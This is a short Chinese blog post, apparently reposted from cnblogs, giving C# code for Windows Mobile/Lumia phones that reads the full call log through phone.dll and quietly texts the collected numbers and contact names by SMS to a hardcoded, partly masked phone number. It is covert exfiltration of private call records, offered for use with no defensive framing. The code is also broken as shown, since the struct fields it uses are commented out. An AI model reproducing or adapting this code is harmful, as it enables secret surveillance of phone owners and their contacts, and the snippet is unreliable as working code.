实现诺基亚 lumia Windows phone 的手机通话记录截取



废话少说,看看代码




using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using Microsoft.WindowsMobile.PocketOutlook;

namespace ReturnCall
{

    class Program
    {
        [StructLayout(LayoutKind.Sequential)]
        public struct CALLLOGENTRY
        {
            /*
            public UInt32 cbSize;
            public UInt64 ftStartTime;
            public UInt64 ftEndTime;
            public short iom;

            public bool fOutgoing;
            public bool fConnected;
            public bool fEnded;

            public bool fRoam;
            public short cidt;
            public IntPtr pszNumber;
            public IntPtr pszName;
            public IntPtr pszNameType;
            public IntPtr pszNote;
             */
        };
        [DllImport("phone.dll", EntryPoint = "PhoneOpenCallLog", SetLastError = true)]
        private static extern int PhoneOpenCallLog(ref IntPtr pHandle);



        [DllImport("phone.dll", EntryPoint = "PhoneCloseCallLog", SetLastError = true)]
        private static extern int PhoneCloseCallLog(IntPtr pHandle);



        [DllImport("phone.dll", EntryPoint = "PhoneGetCallLogEntry", SetLastError = true)]
        private static extern int PhoneGetCallLogEntry(IntPtr pHandke, ref CALLLOGENTRY pEntry);


        static void Main(string[] args)
        {
            {
                string CallInfo = "";

                try
                {
                    IntPtr handle = IntPtr.Zero;

                    CALLLOGENTRY entry = new CALLLOGENTRY();
                    PhoneOpenCallLog(ref handle);
                    entry.cbSize = (uint)Marshal.SizeOf(entry);

                    if (handle != IntPtr.Zero)
                    {
                        while (PhoneGetCallLogEntry(handle, ref entry) == 0)
                        {

                            string phoneNumber = Marshal.PtrToStringUni(entry.pszNumber);
                            string name = Marshal.PtrToStringUni(entry.pszName);

                            if (phoneNumber == null)
                            {
                                phoneNumber = string.Empty;
                            }

                            if (name == null)
                            {
                                name = string.Empty;
                            }

                            string temp = (phoneNumber.Trim() + name.Trim());
                            CallInfo = CallInfo + temp;
                        }
                        PhoneCloseCallLog(handle);
                        Microsoft.WindowsMobile.PocketOutlook.SmsMessage sms = new SmsMessage("151608XXXXXX", CallInfo.Substring(0, 140));
                        sms.Send();
                    }
                    else
                    {

                        int error = Marshal.GetLastWin32Error();
                    }
                }
                catch (Exception ep)
                {
                }
                finally
                {
                }
            }

        }
    }
}






转载于:https://www.cnblogs.com/new0801/archive/2012/07/16/6177733.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值